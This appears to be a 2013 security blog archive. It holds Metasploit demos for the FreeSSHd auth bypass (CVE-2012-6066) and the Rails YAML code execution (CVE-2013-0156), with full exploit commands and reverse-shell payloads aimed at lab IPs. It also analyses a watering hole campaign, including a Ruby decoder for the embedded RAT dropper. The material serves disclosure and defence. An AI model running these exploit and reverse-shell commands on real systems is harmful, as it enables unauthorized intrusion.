Yearly Archives: 2013

CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

Timeline :

Vulnerability initially discovered by Aris on 2010-08-11
PoC provided by kcope on 2012-12-01
Metasploit PoC provided on 2013-01-13

PoC provided by :

kcope
Aris
Daniele Martini

Reference(s) :

CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010

Affected version(s) :

Freesshd version 1.2.6 and prior

Tested on Windows XP SP3 with :

Freesshd 1.2.4

Description :

This module exploits a vulnerability in FreeSSHd 1.2.6 and earlier to bypass authentication. Only the username is needed (it defaults to root). The exploit has been tested with both password and public-key authentication.

Commands :

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run

use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Watering Hole Campaign Use Latest Java and IE Vulnerabilities

Through a collaboration between Jindrich Kubec (@Jindroush), Director of Threat Intelligence at avast!, and Eric Romang (@eromang), independent security researcher, we can confirm that the watering hole campaigns are still ongoing, targeting multiple high-value web sites, including for example a major Hong Kong political party. We can also confirm that a second major Hong Kong political party is a victim of this watering hole campaign.

This website is currently using a new version of the original Internet Explorer (CVE-2012-4792) attack, patched in MS13-008, but it is now also using the latest Java vulnerability (CVE-2013-0422), patched in Oracle Java 7 Update 11.

We will provide further details on the affected web sites after they have been cleaned.

The Chinese-language version of the targeted web site performs a remote JavaScript inclusion of “hxxp://www.[REDACTED].org/board/data/m/m.js”.


The included site is a legitimate, compromised website hosted in South Korea and used for hosting the exploit files.

This include file uses the well-known “deployJava” function, aka “deployJava.js”, and creates a cookie named “Somethingeeee” with a one-day expiration. This cookie is quite strange, and it can also be found in exploits that are years old, which suggests this is only one part of a greater, long-running operation.


If Internet Explorer 8 is used, an iframe is loaded from “hxxp://www.[REDACTED].org/board/data/m/mt.html”. Otherwise, if Oracle Java is detected, an iframe loads “hxxp://www.[REDACTED].org/board/data/m/javamt.html”.

Analysis of “mt.html”

“mt.html” (d85e34827980b13c9244cbcab13b35ea) is an obfuscated JavaScript file which attempts to exploit the latest Internet Explorer vulnerability, CVE-2012-4792, fixed in MS13-008, which Microsoft released Monday morning.

https://www.virustotal.com/file/58588ce6d0a1e042450946b03fa4cd92ac1b4246cb6879a7f50a0aab2a84086a/analysis/ (avast! detects this code as JS:Bogidow-A [Expl] through its Script Shield component).

Compared to the original CFR and Capstone Turbine versions, this code does not target specific browser language settings, but it is based on the version used on CFR, with the “boy” and “girl” patterns.

The traditional “today.swf” has been replaced with “logo1229.swf” (da0287b9ebe79bee42685510ac94dc4f), “news.html” with “DOITYOUR02.html” (cf394f4619db14d335dde12ca9657656) and “robots.txt” with “DOITYOUR01.txt” (a1f6e988cfaa4d7a910183570cde0dc0). The traditional dropper “xsainfo.jpg” is now embedded in the “mt.html” file and obfuscated inside the JavaScript.

The executable can be extracted from the string by cutting off the first 13 characters, converting the hex characters to binary and XORing the whole binary blob with 0xBF. The resulting file, with SHA256 CE6C5D2DCF5E9BDECBF15E95943F4FFA845F8F07ED2D10FD6E544F30A9353AD2, is a RAT which communicates with a domain hosted in Hong Kong by New World Telecom.
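The extraction steps above (drop 13 characters, hex-decode, XOR with 0xBF) as a small Ruby decoder, written here as an added analysis helper and not taken from the campaign or from the authors. The 13-character prefix and the sample bytes are constructed for the demonstration; the real dropper is not embedded here.

```ruby
XOR_KEY    = 0xBF  # single-byte key from the analysis
PREFIX_LEN = 13    # leading characters to discard, from the analysis

# Recover the embedded executable: drop the 13-character prefix, hex-decode
# the remainder, then XOR every byte with 0xBF.
def extract_embedded_pe(blob)
  hex = blob[PREFIX_LEN..-1] || ''
  unless hex.length.even? && hex.match?(/\A[0-9a-fA-F]*\z/)
    raise ArgumentError, 'payload after prefix is not an even-length hex string'
  end
  [hex].pack('H*').bytes.map { |b| b ^ XOR_KEY }.pack('C*')
end

# Cheap sanity check before writing the result to disk: a PE file starts with "MZ".
def looks_like_pe?(bytes)
  bytes.byteslice(0, 2) == 'MZ'
end

# Inverse transform, used here only to build a constructed sample blob.
def embed(pe_bytes, prefix)
  raise ArgumentError, "prefix must be #{PREFIX_LEN} chars" unless prefix.length == PREFIX_LEN
  prefix + pe_bytes.bytes.map { |b| format('%02X', b ^ XOR_KEY) }.join
end

# Constructed stub: the first bytes of a DOS/PE header, not a real binary.
SAMPLE_PE   = "MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF".b
# Constructed 13-character placeholder standing in for the JavaScript prefix.
SAMPLE_BLOB = embed(SAMPLE_PE, 'CONSTRUCTED13')

if __FILE__ == $PROGRAM_NAME
  pe = extract_embedded_pe(SAMPLE_BLOB)
  puts "recovered #{pe.bytesize} bytes, PE header present: #{looks_like_pe?(pe)}"
end
```

On a real sample, hash the recovered bytes and compare against the SHA256 quoted above before doing anything else with the file.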

Analysis of “javamt.html”

“javamt.html” (b32bf36160c7a3cc5bc765672f7d6f2c) checks whether Oracle Java 7 is present; if so, the latest Java vulnerability, CVE-2013-0422, is exploited through “AppletHigh.jar” (521eab796271254793280746dbfd9951). If Oracle Java 6 is present, “AppletLow.jar” (2062203f0ecdaf60df34b5bdfd8eacdc) exploits CVE-2011-3544 instead. Both applets contain the very same binary mentioned above (unencrypted).


Conclusion

As you can see, the watering hole campaign continues, but it has evolved both in form and by using the latest Oracle Java vulnerability. There is just one piece of advice: patch, patch, patch… and see you soon.

MS13-008 Patch Internet Explorer CVE-2012-4792 0day Vulnerability

As announced yesterday in an advance notification, Microsoft has released an out-of-band patch, MS13-008, to fix the Internet Explorer 0day CVE-2012-4792, which was discovered being exploited in targeted attacks against different organizations such as the Council on Foreign Relations (CFR.org), a foreign policy group.

This vulnerability was acknowledged by Microsoft in MSA-2794220 on 30 December, but it had been exploited in targeted attacks since at least the beginning of December. Two weeks after the acknowledgement, the patch is out and fixes this vulnerability in Internet Explorer 6, 7 and 8. So just patch, patch, patch until the next Internet Explorer 0day is found exploited in targeted attacks… See you in two or three months.

CVE-2013-0156 Ruby on Rails XML Processor YAML Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by numerous people
Coordinated public release of the vulnerability on 2013-01-08
Metasploit PoC provided on 2013-01-09

PoC provided by :

charliesome
espes
lian
hdm

Reference(s) :

CVE-2013-0156
Exploiting Ruby on Rails with Metasploit (CVE-2013-0156)

Affected version(s) :

All versions of Ruby on Rails (RoR) prior to 3.2.11, 3.1.10, 3.0.19 and 2.3.15

Tested on Centos 6.3 i386 with :

RoR 3.2.10
passenger 3.0.19
GrayLog2 0.9.6

Description :

This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute arbitrary Ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x. The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.
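The XML processor reaches YAML through the type attribute on XML nodes, so a request-body screen for type="yaml" and type="symbol" nodes (the two converters the Rails fix removed from ActiveSupport::XmlMini::PARSING) gives a defender a quick pre-filter or log signature. This is an added Ruby example, not Rails or Metasploit code; the request bodies are constructed, and the regex is a screener, not a full XML parser.

```ruby
# The two XmlMini converters the Rails fix for CVE-2013-0156 disabled; the
# advisory's workaround deletes these keys from ActiveSupport::XmlMini::PARSING.
DANGEROUS_XML_TYPES = %w[yaml symbol].freeze

# Match an element carrying a type="..." attribute, e.g. <id type="yaml">.
# Accepts single or double quotes and mixed case; stays inside one tag.
TYPED_ELEMENT = /<([A-Za-z_][\w:.-]*)[^>]*\stype\s*=\s*(["'])([^"']*)\2/i

# Return [element_name, type] pairs for every node typed with a converter the
# fix removed. An empty array means the body declares no such node.
def dangerous_typed_nodes(body)
  body.scan(TYPED_ELEMENT)
      .map { |name, _quote, type| [name, type.strip.downcase] }
      .select { |_name, type| DANGEROUS_XML_TYPES.include?(type) }
end

def xml_body_acceptable?(body)
  dangerous_typed_nodes(body).empty?
end

# Constructed request bodies for the demonstration.
BENIGN_BODY = <<~XML
  <?xml version="1.0"?>
  <message>
    <id type="integer">42</id>
    <text>hello</text>
  </message>
XML

SUSPECT_BODY = <<~XML
  <?xml version="1.0"?>
  <message>
    <text type='YAML'>--- foo</text>
    <flag type="symbol">foo</flag>
  </message>
XML

if __FILE__ == $PROGRAM_NAME
  [BENIGN_BODY, SUSPECT_BODY].each do |body|
    hits = dangerous_typed_nodes(body)
    puts hits.empty? ? 'accept' : "reject: #{hits.map { |n, t| "#{n}(#{t})" }.join(', ')}"
  end
end
```

Upgrading to the fixed Rails versions is the real remedy; this screen only helps triage logs and buys time for the upgrade.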

Commands :

use auxiliary/scanner/http/rails_xml_yaml_scanner
set RHOSTS 192.168.21.124
set VHOST rails.zataz.loc
run

use exploit/multi/http/rails_xml_yaml_code_exec
set RHOST 192.168.21.124
set VHOST rails.zataz.loc
set PAYLOAD ruby/shell_reverse_tcp
set LHOST 192.168.21.169
exploit

id
uname -a